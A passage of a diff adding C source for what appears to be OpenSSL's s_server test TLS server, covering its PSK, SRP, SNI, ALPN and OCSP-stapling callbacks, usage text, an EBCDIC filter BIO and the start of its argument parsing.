+static int keymatexportlen = 20;
+
+static int hack = 0;
+#ifndef OPENSSL_NO_ENGINE
+static char *engine_id = NULL;
+#endif
+static const char *session_id_prefix = NULL;
+
+static int enable_timeouts = 0;
+static long socket_mtu;
+#ifndef OPENSSL_NO_DTLS1
+static int cert_chain = 0;
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+static BIO *serverinfo_in = NULL;
+static const char *s_serverinfo_file = NULL;
+
+#endif
+
+#ifndef OPENSSL_NO_PSK
+static char *psk_identity = "Client_identity";
+char *psk_key = NULL;           /* by default PSK is not used */
+
+static unsigned int psk_server_cb(SSL *ssl, const char *identity,
+                                  unsigned char *psk,
+                                  unsigned int max_psk_len)
+{
+    unsigned int psk_len = 0;
+    int ret;
+    BIGNUM *bn = NULL;
+
+    if (s_debug)
+        BIO_printf(bio_s_out, "psk_server_cb\n");
+    if (!identity) {
+        BIO_printf(bio_err, "Error: client did not send PSK identity\n");
+        goto out_err;
+    }
+    if (s_debug)
+        BIO_printf(bio_s_out, "identity_len=%d identity=%s\n",
+                   identity ? (int)strlen(identity) : 0, identity);
+
+    /* here we could lookup the given identity e.g. from a database */
+    if (strcmp(identity, psk_identity) != 0) {
+        BIO_printf(bio_s_out, "PSK error: client identity not found"
+                   " (got '%s' expected '%s')\n", identity, psk_identity);
+        goto out_err;
+    }
+    if (s_debug)
+        BIO_printf(bio_s_out, "PSK client identity found\n");
+
+    /* convert the PSK key to binary */
+    ret = BN_hex2bn(&bn, psk_key);
+    if (!ret) {
+        BIO_printf(bio_err, "Could not convert PSK key '%s' to BIGNUM\n",
+                   psk_key);
+        if (bn)
+            BN_free(bn);
+        return 0;
+    }
+    if (BN_num_bytes(bn) > (int)max_psk_len) {
+        BIO_printf(bio_err,
+                   "psk buffer of callback is too small (%d) for key (%d)\n",
+                   max_psk_len, BN_num_bytes(bn));
+        BN_free(bn);
+        return 0;
+    }
+
+    ret = BN_bn2bin(bn, psk);
+    BN_free(bn);
+
+    if (ret < 0)
+        goto out_err;
+    psk_len = (unsigned int)ret;
+
+    if (s_debug)
+        BIO_printf(bio_s_out, "fetched PSK len=%d\n", psk_len);
+    return psk_len;
+ out_err:
+    if (s_debug)
+        BIO_printf(bio_err, "Error in PSK server callback\n");
+    return 0;
+}
+#endif
+
+#ifndef OPENSSL_NO_SRP
+/* This is a context that we pass to callbacks */
+typedef struct srpsrvparm_st {
+    char *login;
+    SRP_VBASE *vb;
+    SRP_user_pwd *user;
+} srpsrvparm;
+
+/*
+ * This callback pretends to require some asynchronous logic in order to
+ * obtain a verifier. When the callback is called for a new connection we
+ * return with a negative value. This will provoke the accept etc to return
+ * with an LOOKUP_X509. The main logic of the reinvokes the suspended call
+ * (which would normally occur after a worker has finished) and we set the
+ * user parameters.
+ */
+static int MS_CALLBACK ssl_srp_server_param_cb(SSL *s, int *ad, void *arg)
+{
+    srpsrvparm *p = (srpsrvparm *) arg;
+    if (p->login == NULL && p->user == NULL) {
+        p->login = SSL_get_srp_username(s);
+        BIO_printf(bio_err, "SRP username = \"%s\"\n", p->login);
+        return (-1);
+    }
+
+    if (p->user == NULL) {
+        BIO_printf(bio_err, "User %s doesn't exist\n", p->login);
+        return SSL3_AL_FATAL;
+    }
+    if (SSL_set_srp_server_param
+        (s, p->user->N, p->user->g, p->user->s, p->user->v,
+         p->user->info) < 0) {
+        *ad = SSL_AD_INTERNAL_ERROR;
+        return SSL3_AL_FATAL;
+    }
+    BIO_printf(bio_err,
+               "SRP parameters set: username = \"%s\" info=\"%s\" \n",
+               p->login, p->user->info);
+    /* need to check whether there are memory leaks */
+    p->user = NULL;
+    p->login = NULL;
+    return SSL_ERROR_NONE;
+}
+
+#endif
+
+#ifdef MONOLITH
+static void s_server_init(void)
+{
+    accept_socket = -1;
+    s_server_verify = SSL_VERIFY_NONE;
+    s_dcert_file = NULL;
+    s_dkey_file = NULL;
+    s_dchain_file = NULL;
+    s_cert_file = TEST_CERT;
+    s_key_file = NULL;
+    s_chain_file = NULL;
+# ifndef OPENSSL_NO_TLSEXT
+    s_cert_file2 = TEST_CERT2;
+    s_key_file2 = NULL;
+    ctx2 = NULL;
+# endif
+# ifdef FIONBIO
+    s_nbio = 0;
+# endif
+    s_nbio_test = 0;
+    ctx = NULL;
+    www = 0;
+
+    bio_s_out = NULL;
+    s_debug = 0;
+    s_msg = 0;
+    s_quiet = 0;
+    s_brief = 0;
+    hack = 0;
+# ifndef OPENSSL_NO_ENGINE
+    engine_id = NULL;
+# endif
+}
+#endif
+
+static void sv_usage(void)
+{
+    BIO_printf(bio_err, "usage: s_server [args ...]\n");
+    BIO_printf(bio_err, "\n");
+    BIO_printf(bio_err,
+               " -accept arg   - port to accept on (default is %d)\n", PORT);
+    BIO_printf(bio_err,
+               " -verify_host host - check peer certificate matches \"host\"\n");
+    BIO_printf(bio_err,
+               " -verify_email email - check peer certificate matches \"email\"\n");
+    BIO_printf(bio_err,
+               " -verify_ip ipaddr - check peer certificate matches \"ipaddr\"\n");
+    BIO_printf(bio_err, " -context arg  - set session ID context\n");
+    BIO_printf(bio_err,
+               " -verify arg   - turn on peer certificate verification\n");
+    BIO_printf(bio_err,
+               " -Verify arg   - turn on peer certificate verification, must have a cert.\n");
+    BIO_printf(bio_err,
+               " -verify_return_error - return verification errors\n");
+    BIO_printf(bio_err, " -cert arg     - certificate file to use\n");
+    BIO_printf(bio_err, "                 (default is %s)\n", TEST_CERT);
+#ifndef OPENSSL_NO_TLSEXT
+    BIO_printf(bio_err,
+               " -serverinfo arg - PEM serverinfo file for certificate\n");
+    BIO_printf(bio_err,
+               " -auth               - send and receive RFC 5878 TLS auth extensions and supplemental data\n");
+    BIO_printf(bio_err,
+               " -auth_require_reneg - Do not send TLS auth extensions until renegotiation\n");
+#endif
+    BIO_printf(bio_err,
+               " -no_resumption_on_reneg - set SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION flag\n");
+    BIO_printf(bio_err,
+               " -crl_check    - check the peer certificate has not been revoked by its CA.\n"
+               "                 The CRL(s) are appended to the certificate file\n");
+    BIO_printf(bio_err,
+               " -crl_check_all - check the peer certificate has not been revoked by its CA\n"
+               "                 or any other CRL in the CA chain. CRL(s) are appened to the\n"
+               "                 the certificate file.\n");
+    BIO_printf(bio_err,
+               " -certform arg - certificate format (PEM or DER) PEM default\n");
+    BIO_printf(bio_err,
+               " -key arg      - Private Key file to use, in cert file if\n");
+    BIO_printf(bio_err, "                 not specified (default is %s)\n",
+               TEST_CERT);
+    BIO_printf(bio_err,
+               " -keyform arg  - key format (PEM, DER or ENGINE) PEM default\n");
+    BIO_printf(bio_err,
+               " -pass arg     - private key file pass phrase source\n");
+    BIO_printf(bio_err,
+               " -dcert arg    - second certificate file to use (usually for DSA)\n");
+    BIO_printf(bio_err,
+               " -dcertform x  - second certificate format (PEM or DER) PEM default\n");
+    BIO_printf(bio_err,
+               " -dkey arg     - second private key file to use (usually for DSA)\n");
+    BIO_printf(bio_err,
+               " -dkeyform arg - second key format (PEM, DER or ENGINE) PEM default\n");
+    BIO_printf(bio_err,
+               " -dpass arg    - second private key file pass phrase source\n");
+    BIO_printf(bio_err,
+               " -dhparam arg  - DH parameter file to use, in cert file if not specified\n");
+    BIO_printf(bio_err,
+               "                 or a default set of parameters is used\n");
+#ifndef OPENSSL_NO_ECDH
+    BIO_printf(bio_err,
+               " -named_curve arg  - Elliptic curve name to use for ephemeral ECDH keys.\n"
+               "                 Use \"openssl ecparam -list_curves\" for all names\n"
+               "                 (default is nistp256).\n");
+#endif
+#ifdef FIONBIO
+    BIO_printf(bio_err, " -nbio         - Run with non-blocking IO\n");
+#endif
+    BIO_printf(bio_err,
+               " -nbio_test    - test with the non-blocking test bio\n");
+    BIO_printf(bio_err,
+               " -crlf         - convert LF from terminal into CRLF\n");
+    BIO_printf(bio_err, " -debug        - Print more output\n");
+    BIO_printf(bio_err, " -msg          - Show protocol messages\n");
+    BIO_printf(bio_err, " -state        - Print the SSL states\n");
+    BIO_printf(bio_err, " -CApath arg   - PEM format directory of CA's\n");
+    BIO_printf(bio_err, " -CAfile arg   - PEM format file of CA's\n");
+    BIO_printf(bio_err,
+               " -nocert       - Don't use any certificates (Anon-DH)\n");
+    BIO_printf(bio_err,
+               " -cipher arg   - play with 'openssl ciphers' to see what goes here\n");
+    BIO_printf(bio_err, " -serverpref   - Use server's cipher preferences\n");
+    BIO_printf(bio_err, " -quiet        - No server output\n");
+    BIO_printf(bio_err, " -no_tmp_rsa   - Do not generate a tmp RSA key\n");
+#ifndef OPENSSL_NO_PSK
+    BIO_printf(bio_err, " -psk_hint arg - PSK identity hint to use\n");
+    BIO_printf(bio_err, " -psk arg      - PSK in hex (without 0x)\n");
+# ifndef OPENSSL_NO_JPAKE
+    BIO_printf(bio_err, " -jpake arg    - JPAKE secret to use\n");
+# endif
+#endif
+#ifndef OPENSSL_NO_SRP
+    BIO_printf(bio_err, " -srpvfile file      - The verifier file for SRP\n");
+    BIO_printf(bio_err,
+               " -srpuserseed string - A seed string for a default user salt.\n");
+#endif
+    BIO_printf(bio_err, " -ssl2         - Just talk SSLv2\n");
+#ifndef OPENSSL_NO_SSL3_METHOD
+    BIO_printf(bio_err, " -ssl3         - Just talk SSLv3\n");
+#endif
+    BIO_printf(bio_err, " -tls1_2       - Just talk TLSv1.2\n");
+    BIO_printf(bio_err, " -tls1_1       - Just talk TLSv1.1\n");
+    BIO_printf(bio_err, " -tls1         - Just talk TLSv1\n");
+    BIO_printf(bio_err, " -dtls1        - Just talk DTLSv1\n");
+    BIO_printf(bio_err, " -dtls1_2      - Just talk DTLSv1.2\n");
+    BIO_printf(bio_err, " -timeout      - Enable timeouts\n");
+    BIO_printf(bio_err, " -mtu          - Set link layer MTU\n");
+    BIO_printf(bio_err, " -chain        - Read a certificate chain\n");
+    BIO_printf(bio_err, " -no_ssl2      - Just disable SSLv2\n");
+    BIO_printf(bio_err, " -no_ssl3      - Just disable SSLv3\n");
+    BIO_printf(bio_err, " -no_tls1      - Just disable TLSv1\n");
+    BIO_printf(bio_err, " -no_tls1_1    - Just disable TLSv1.1\n");
+    BIO_printf(bio_err, " -no_tls1_2    - Just disable TLSv1.2\n");
+#ifndef OPENSSL_NO_DH
+    BIO_printf(bio_err, " -no_dhe       - Disable ephemeral DH\n");
+#endif
+#ifndef OPENSSL_NO_ECDH
+    BIO_printf(bio_err, " -no_ecdhe     - Disable ephemeral ECDH\n");
+#endif
+    BIO_printf(bio_err, " -bugs         - Turn on SSL bug compatibility\n");
+    BIO_printf(bio_err,
+               " -hack         - workaround for early Netscape code\n");
+    BIO_printf(bio_err,
+               " -www          - Respond to a 'GET /' with a status page\n");
+    BIO_printf(bio_err,
+               " -WWW          - Respond to a 'GET /<path> HTTP/1.0' with file ./<path>\n");
+    BIO_printf(bio_err,
+               " -HTTP         - Respond to a 'GET /<path> HTTP/1.0' with file ./<path>\n");
+    BIO_printf(bio_err,
+               "                 with the assumption it contains a complete HTTP response.\n");
+#ifndef OPENSSL_NO_ENGINE
+    BIO_printf(bio_err,
+               " -engine id    - Initialise and use the specified engine\n");
+#endif
+    BIO_printf(bio_err,
+               " -id_prefix arg - Generate SSL/TLS session IDs prefixed by 'arg'\n");
+    BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+               LIST_SEPARATOR_CHAR);
+#ifndef OPENSSL_NO_TLSEXT
+    BIO_printf(bio_err,
+               " -servername host - servername for HostName TLS extension\n");
+    BIO_printf(bio_err,
+               " -servername_fatal - on mismatch send fatal alert (default warning alert)\n");
+    BIO_printf(bio_err,
+               " -cert2 arg    - certificate file to use for servername\n");
+    BIO_printf(bio_err, "                 (default is %s)\n", TEST_CERT2);
+    BIO_printf(bio_err,
+               " -key2 arg     - Private Key file to use for servername, in cert file if\n");
+    BIO_printf(bio_err, "                 not specified (default is %s)\n",
+               TEST_CERT2);
+    BIO_printf(bio_err,
+               " -tlsextdebug  - hex dump of all TLS extensions received\n");
+    BIO_printf(bio_err,
+               " -no_ticket    - disable use of RFC4507bis session tickets\n");
+    BIO_printf(bio_err,
+               " -legacy_renegotiation - enable use of legacy renegotiation (dangerous)\n");
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    BIO_printf(bio_err,
+               " -nextprotoneg arg - set the advertised protocols for the NPN extension (comma-separated list)\n");
+# endif
+# ifndef OPENSSL_NO_SRTP
+    BIO_printf(bio_err,
+               " -use_srtp profiles - Offer SRTP key management with a colon-separated profile list\n");
+# endif
+    BIO_printf(bio_err,
+               " -alpn arg  - set the advertised protocols for the ALPN extension (comma-separated list)\n");
+#endif
+    BIO_printf(bio_err,
+               " -keymatexport label   - Export keying material using label\n");
+    BIO_printf(bio_err,
+               " -keymatexportlen len  - Export len bytes of keying material (default 20)\n");
+    BIO_printf(bio_err,
+               " -status           - respond to certificate status requests\n");
+    BIO_printf(bio_err,
+               " -status_verbose   - enable status request verbose printout\n");
+    BIO_printf(bio_err,
+               " -status_timeout n - status request responder timeout\n");
+    BIO_printf(bio_err, " -status_url URL   - status request fallback URL\n");
+}
+
+static int local_argc = 0;
+static char **local_argv;
+
+#ifdef CHARSET_EBCDIC
+static int ebcdic_new(BIO *bi);
+static int ebcdic_free(BIO *a);
+static int ebcdic_read(BIO *b, char *out, int outl);
+static int ebcdic_write(BIO *b, const char *in, int inl);
+static long ebcdic_ctrl(BIO *b, int cmd, long num, void *ptr);
+static int ebcdic_gets(BIO *bp, char *buf, int size);
+static int ebcdic_puts(BIO *bp, const char *str);
+
+# define BIO_TYPE_EBCDIC_FILTER  (18|0x0200)
+static BIO_METHOD methods_ebcdic = {
+    BIO_TYPE_EBCDIC_FILTER,
+    "EBCDIC/ASCII filter",
+    ebcdic_write,
+    ebcdic_read,
+    ebcdic_puts,
+    ebcdic_gets,
+    ebcdic_ctrl,
+    ebcdic_new,
+    ebcdic_free,
+};
+
+typedef struct {
+    size_t alloced;
+    char buff[1];
+} EBCDIC_OUTBUFF;
+
+BIO_METHOD *BIO_f_ebcdic_filter()
+{
+    return (&methods_ebcdic);
+}
+
+static int ebcdic_new(BIO *bi)
+{
+    EBCDIC_OUTBUFF *wbuf;
+
+    wbuf = (EBCDIC_OUTBUFF *) OPENSSL_malloc(sizeof(EBCDIC_OUTBUFF) + 1024);
+    wbuf->alloced = 1024;
+    wbuf->buff[0] = '\0';
+
+    bi->ptr = (char *)wbuf;
+    bi->init = 1;
+    bi->flags = 0;
+    return (1);
+}
+
+static int ebcdic_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->ptr != NULL)
+        OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int ebcdic_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (out == NULL || outl == 0)
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+
+    ret = BIO_read(b->next_bio, out, outl);
+    if (ret > 0)
+        ascii2ebcdic(out, out, ret);
+    return (ret);
+}
+
+static int ebcdic_write(BIO *b, const char *in, int inl)
+{
+    EBCDIC_OUTBUFF *wbuf;
+    int ret = 0;
+    int num;
+    unsigned char n;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+
+    wbuf = (EBCDIC_OUTBUFF *) b->ptr;
+
+    if (inl > (num = wbuf->alloced)) {
+        num = num + num;        /* double the size */
+        if (num < inl)
+            num = inl;
+        OPENSSL_free(wbuf);
+        wbuf =
+            (EBCDIC_OUTBUFF *) OPENSSL_malloc(sizeof(EBCDIC_OUTBUFF) + num);
+
+        wbuf->alloced = num;
+        wbuf->buff[0] = '\0';
+
+        b->ptr = (char *)wbuf;
+    }
+
+    ebcdic2ascii(wbuf->buff, in, inl);
+
+    ret = BIO_write(b->next_bio, wbuf->buff, inl);
+
+    return (ret);
+}
+
+static long ebcdic_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    case BIO_CTRL_DUP:
+        ret = 0L;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static int ebcdic_gets(BIO *bp, char *buf, int size)
+{
+    int i, ret = 0;
+    if (bp->next_bio == NULL)
+        return (0);
+/*      return(BIO_gets(bp->next_bio,buf,size));*/
+    for (i = 0; i < size - 1; ++i) {
+        ret = ebcdic_read(bp, &buf[i], 1);
+        if (ret <= 0)
+            break;
+        else if (buf[i] == '\n') {
+            ++i;
+            break;
+        }
+    }
+    if (i < size)
+        buf[i] = '\0';
+    return (ret < 0 && i == 0) ? ret : i;
+}
+
+static int ebcdic_puts(BIO *bp, const char *str)
+{
+    if (bp->next_bio == NULL)
+        return (0);
+    return ebcdic_write(bp, str, strlen(str));
+}
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+
+/* This is a context that we pass to callbacks */
+typedef struct tlsextctx_st {
+    char *servername;
+    BIO *biodebug;
+    int extension_error;
+} tlsextctx;
+
+static int MS_CALLBACK ssl_servername_cb(SSL *s, int *ad, void *arg)
+{
+    tlsextctx *p = (tlsextctx *) arg;
+    const char *servername = SSL_get_servername(s, TLSEXT_NAMETYPE_host_name);
+    if (servername && p->biodebug)
+        BIO_printf(p->biodebug, "Hostname in TLS extension: \"%s\"\n",
+                   servername);
+
+    if (!p->servername)
+        return SSL_TLSEXT_ERR_NOACK;
+
+    if (servername) {
+        if (strcasecmp(servername, p->servername))
+            return p->extension_error;
+        if (ctx2) {
+            BIO_printf(p->biodebug, "Switching server context.\n");
+            SSL_set_SSL_CTX(s, ctx2);
+        }
+    }
+    return SSL_TLSEXT_ERR_OK;
+}
+
+/* Structure passed to cert status callback */
+
+typedef struct tlsextstatusctx_st {
+    /* Default responder to use */
+    char *host, *path, *port;
+    int use_ssl;
+    int timeout;
+    BIO *err;
+    int verbose;
+} tlsextstatusctx;
+
+static tlsextstatusctx tlscstatp = { NULL, NULL, NULL, 0, -1, NULL, 0 };
+
+/*
+ * Certificate Status callback. This is called when a client includes a
+ * certificate status request extension. This is a simplified version. It
+ * examines certificates each time and makes one OCSP responder query for
+ * each request. A full version would store details such as the OCSP
+ * certificate IDs and minimise the number of OCSP responses by caching them
+ * until they were considered "expired".
+ */
+
+static int cert_status_cb(SSL *s, void *arg)
+{
+    tlsextstatusctx *srctx = arg;
+    BIO *err = srctx->err;
+    char *host, *port, *path;
+    int use_ssl;
+    unsigned char *rspder = NULL;
+    int rspderlen;
+    STACK_OF(OPENSSL_STRING) *aia = NULL;
+    X509 *x = NULL;
+    X509_STORE_CTX inctx;
+    X509_OBJECT obj;
+    OCSP_REQUEST *req = NULL;
+    OCSP_RESPONSE *resp = NULL;
+    OCSP_CERTID *id = NULL;
+    STACK_OF(X509_EXTENSION) *exts;
+    int ret = SSL_TLSEXT_ERR_NOACK;
+    int i;
+# if 0
+    STACK_OF(OCSP_RESPID) *ids;
+    SSL_get_tlsext_status_ids(s, &ids);
+    BIO_printf(err, "cert_status: received %d ids\n",
+               sk_OCSP_RESPID_num(ids));
+# endif
+    if (srctx->verbose)
+        BIO_puts(err, "cert_status: callback called\n");
+    /* Build up OCSP query from server certificate */
+    x = SSL_get_certificate(s);
+    aia = X509_get1_ocsp(x);
+    if (aia) {
+        if (!OCSP_parse_url(sk_OPENSSL_STRING_value(aia, 0),
+                            &host, &port, &path, &use_ssl)) {
+            BIO_puts(err, "cert_status: can't parse AIA URL\n");
+            goto err;
+        }
+        if (srctx->verbose)
+            BIO_printf(err, "cert_status: AIA URL: %s\n",
+                       sk_OPENSSL_STRING_value(aia, 0));
+    } else {
+        if (!srctx->host) {
+            BIO_puts(srctx->err,
+                     "cert_status: no AIA and no default responder URL\n");
+            goto done;
+        }
+        host = srctx->host;
+        path = srctx->path;
+        port = srctx->port;
+        use_ssl = srctx->use_ssl;
+    }
+
+    if (!X509_STORE_CTX_init(&inctx,
+                             SSL_CTX_get_cert_store(SSL_get_SSL_CTX(s)),
+                             NULL, NULL))
+        goto err;
+    if (X509_STORE_get_by_subject(&inctx, X509_LU_X509,
+                                  X509_get_issuer_name(x), &obj) <= 0) {
+        BIO_puts(err, "cert_status: Can't retrieve issuer certificate.\n");
+        X509_STORE_CTX_cleanup(&inctx);
+        goto done;
+    }
+    req = OCSP_REQUEST_new();
+    if (!req)
+        goto err;
+    id = OCSP_cert_to_id(NULL, x, obj.data.x509);
+    X509_free(obj.data.x509);
+    X509_STORE_CTX_cleanup(&inctx);
+    if (!id)
+        goto err;
+    if (!OCSP_request_add0_id(req, id))
+        goto err;
+    id = NULL;
+    /* Add any extensions to the request */
+    SSL_get_tlsext_status_exts(s, &exts);
+    for (i = 0; i < sk_X509_EXTENSION_num(exts); i++) {
+        X509_EXTENSION *ext = sk_X509_EXTENSION_value(exts, i);
+        if (!OCSP_REQUEST_add_ext(req, ext, -1))
+            goto err;
+    }
+    resp = process_responder(err, req, host, path, port, use_ssl, NULL,
+                             srctx->timeout);
+    if (!resp) {
+        BIO_puts(err, "cert_status: error querying responder\n");
+        goto done;
+    }
+    rspderlen = i2d_OCSP_RESPONSE(resp, &rspder);
+    if (rspderlen <= 0)
+        goto err;
+    SSL_set_tlsext_status_ocsp_resp(s, rspder, rspderlen);
+    if (srctx->verbose) {
+        BIO_puts(err, "cert_status: ocsp response sent:\n");
+        OCSP_RESPONSE_print(err, resp, 2);
+    }
+    ret = SSL_TLSEXT_ERR_OK;
+ done:
+    if (ret != SSL_TLSEXT_ERR_OK)
+        ERR_print_errors(err);
+    if (aia) {
+        OPENSSL_free(host);
+        OPENSSL_free(path);
+        OPENSSL_free(port);
+        X509_email_free(aia);
+    }
+    if (id)
+        OCSP_CERTID_free(id);
+    if (req)
+        OCSP_REQUEST_free(req);
+    if (resp)
+        OCSP_RESPONSE_free(resp);
+    return ret;
+ err:
+    ret = SSL_TLSEXT_ERR_ALERT_FATAL;
+    goto done;
+}
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/* This is the context that we pass to next_proto_cb */
+typedef struct tlsextnextprotoctx_st {
+    unsigned char *data;
+    unsigned int len;
+} tlsextnextprotoctx;
+
+static int next_proto_cb(SSL *s, const unsigned char **data,
+                         unsigned int *len, void *arg)
+{
+    tlsextnextprotoctx *next_proto = arg;
+
+    *data = next_proto->data;
+    *len = next_proto->len;
+
+    return SSL_TLSEXT_ERR_OK;
+}
+# endif                         /* ndef OPENSSL_NO_NEXTPROTONEG */
+
+/* This the context that we pass to alpn_cb */
+typedef struct tlsextalpnctx_st {
+    unsigned char *data;
+    unsigned short len;
+} tlsextalpnctx;
+
+static int alpn_cb(SSL *s, const unsigned char **out, unsigned char *outlen,
+                   const unsigned char *in, unsigned int inlen, void *arg)
+{
+    tlsextalpnctx *alpn_ctx = arg;
+
+    if (!s_quiet) {
+        /* We can assume that |in| is syntactically valid. */
+        unsigned i;
+        BIO_printf(bio_s_out, "ALPN protocols advertised by the client: ");
+        for (i = 0; i < inlen;) {
+            if (i)
+                BIO_write(bio_s_out, ", ", 2);
+            BIO_write(bio_s_out, &in[i + 1], in[i]);
+            i += in[i] + 1;
+        }
+        BIO_write(bio_s_out, "\n", 1);
+    }
+
+    if (SSL_select_next_proto
+        ((unsigned char **)out, outlen, alpn_ctx->data, alpn_ctx->len, in,
+         inlen) != OPENSSL_NPN_NEGOTIATED) {
+        return SSL_TLSEXT_ERR_NOACK;
+    }
+
+    if (!s_quiet) {
+        BIO_printf(bio_s_out, "ALPN protocols selected: ");
+        BIO_write(bio_s_out, *out, *outlen);
+        BIO_write(bio_s_out, "\n", 1);
+    }
+
+    return SSL_TLSEXT_ERR_OK;
+}
+#endif                          /* ndef OPENSSL_NO_TLSEXT */
+
+int MAIN(int, char **);
+
+#ifndef OPENSSL_NO_JPAKE
+static char *jpake_secret = NULL;
+# define no_jpake !jpake_secret
+#else
+# define no_jpake 1
+#endif
+#ifndef OPENSSL_NO_SRP
+static srpsrvparm srp_callback_parm;
+#endif
+#ifndef OPENSSL_NO_SRTP
+static char *srtp_profiles = NULL;
+#endif
+
+int MAIN(int argc, char *argv[])
+{
+    X509_VERIFY_PARAM *vpm = NULL;
+    int badarg = 0;
+    short port = PORT;
+    char *CApath = NULL, *CAfile = NULL;
+    char *chCApath = NULL, *chCAfile = NULL;
+    char *vfyCApath = NULL, *vfyCAfile = NULL;
+    unsigned char *context = NULL;
+    char *dhfile = NULL;
+    int badop = 0;
+    int ret = 1;
+    int build_chain = 0;
+    int no_tmp_rsa = 0, no_dhe = 0, no_ecdhe = 0, nocert = 0;
+    int state = 0;
+    const SSL_METHOD *meth = NULL;
+    int socket_type = SOCK_STREAM;
+    ENGINE *e = NULL;
+    char *inrand = NULL;
+    int s_cert_format = FORMAT_PEM, s_key_format = FORMAT_PEM;
+    char *passarg = NULL, *pass = NULL;
+    char *dpassarg = NULL, *dpass = NULL;
+    int s_dcert_format = FORMAT_PEM, s_dkey_format = FORMAT_PEM;
+    X509 *s_cert = NULL, *s_dcert = NULL;
+    STACK_OF(X509) *s_chain = NULL, *s_dchain = NULL;
+    EVP_PKEY *s_key = NULL, *s_dkey = NULL;
+    int no_cache = 0, ext_cache = 0;
+    int rev = 0, naccept = -1;
+#ifndef OPENSSL_NO_TLSEXT
+    EVP_PKEY *s_key2 = NULL;
+    X509 *s_cert2 = NULL;
+    tlsextctx tlsextcbp = { NULL, NULL, SSL_TLSEXT_ERR_ALERT_WARNING };
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    const char *next_proto_neg_in = NULL;
+    tlsextnextprotoctx next_proto = { NULL, 0 };
+# endif
+    const char *alpn_in = NULL;
+    tlsextalpnctx alpn_ctx = { NULL, 0 };
+#endif
+#ifndef OPENSSL_NO_PSK
+    /* by default do not send a PSK identity hint */
+    static char *psk_identity_hint = NULL;
+#endif
+#ifndef OPENSSL_NO_SRP
+    char *srpuserseed = NULL;
+    char *srp_verifier_file = NULL;
+#endif
+    SSL_EXCERT *exc = NULL;
+    SSL_CONF_CTX *cctx = NULL;
+    STACK_OF(OPENSSL_STRING) *ssl_args = NULL;
+
+    char *crl_file = NULL;
+    int crl_format = FORMAT_PEM;
+    int crl_download = 0;
+    STACK_OF(X509_CRL) *crls = NULL;
+
+    meth = SSLv23_server_method();
+
+    local_argc = argc;
+    local_argv = argv;
+
+    apps_startup();
+#ifdef MONOLITH
+    s_server_init();
+#endif
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    cctx = SSL_CONF_CTX_new();
+    if (!cctx)
+        goto end;
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_SERVER);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CMDLINE);
+
+    verify_depth = 0;
+#ifdef FIONBIO
+    s_nbio = 0;
+#endif
+    s_nbio_test = 0;
+
+    argc--;
+    argv++;
+
+    while (argc >= 1) {
+        if ((strcmp(*argv, "-port") == 0) || (strcmp(*argv, "-accept") == 0)) {
+            if (--argc < 1)
+                goto bad;
+            if (!extract_port(*(++argv), &port))
+                goto bad;
+        } else if (strcmp(*argv, "-naccept") == 0) {
+            if (--argc < 1)
+                goto bad;
+            naccept = atol(*(++argv));
+            if (naccept <= 0) {
+                BIO_printf(bio_err, "bad accept value %s\n", *argv);
+                goto bad;
+            }
+        } else if (strcmp(*argv, "-verify") == 0) {
+            s_server_verify = SSL_VERIFY_PEER | SSL_VERIFY_CLIENT_ONCE;
+            if (--argc < 1)
+                goto bad;
+            verify_depth = atoi(*(++argv));
+            if (!s_quiet)
+                BIO_printf(bio_err, "verify depth is %d\n", verify_depth);
+        } else if (strcmp(*argv, "-Verify") == 0) {
+            s_server_verify =
+                SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT |
+                SSL_VERIFY_CLIENT_ONCE;
+            if (--argc < 1)
+                goto bad;
+            verify_depth = atoi(*(++argv));
+            if (!s_quiet)
+                BIO_printf(bio_err,
+                           "verify depth is %d, must return a certificate\n",
+                           verify_depth);
+        } else if (strcmp(*argv, "-context") == 0) {
+            if (--argc < 1)
+                goto bad;
+            context = (unsigned char *)*(++argv);
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_cert_file = *(++argv);
+        } else if (strcmp(*argv, "-CRL") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crl_file = *(++argv);
+        } else if (strcmp(*argv, "-crl_download") == 0)
+            crl_download = 1;
+#ifndef OPENSSL_NO_TLSEXT
+        else if (strcmp(*argv, "-serverinfo") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_serverinfo_file = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-certform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_cert_format = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_key_file = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_key_format = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-pass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passarg = *(++argv);
+        } else if (strcmp(*argv, "-cert_chain") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_chain_file = *(++argv);
+        } else if (strcmp(*argv, "-dhparam") == 0) {
+            if (--argc < 1)
+                goto bad;
+            dhfile = *(++argv);
+        } else if (strcmp(*argv, "-dcertform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_dcert_format = str2fmt(*(++argv));
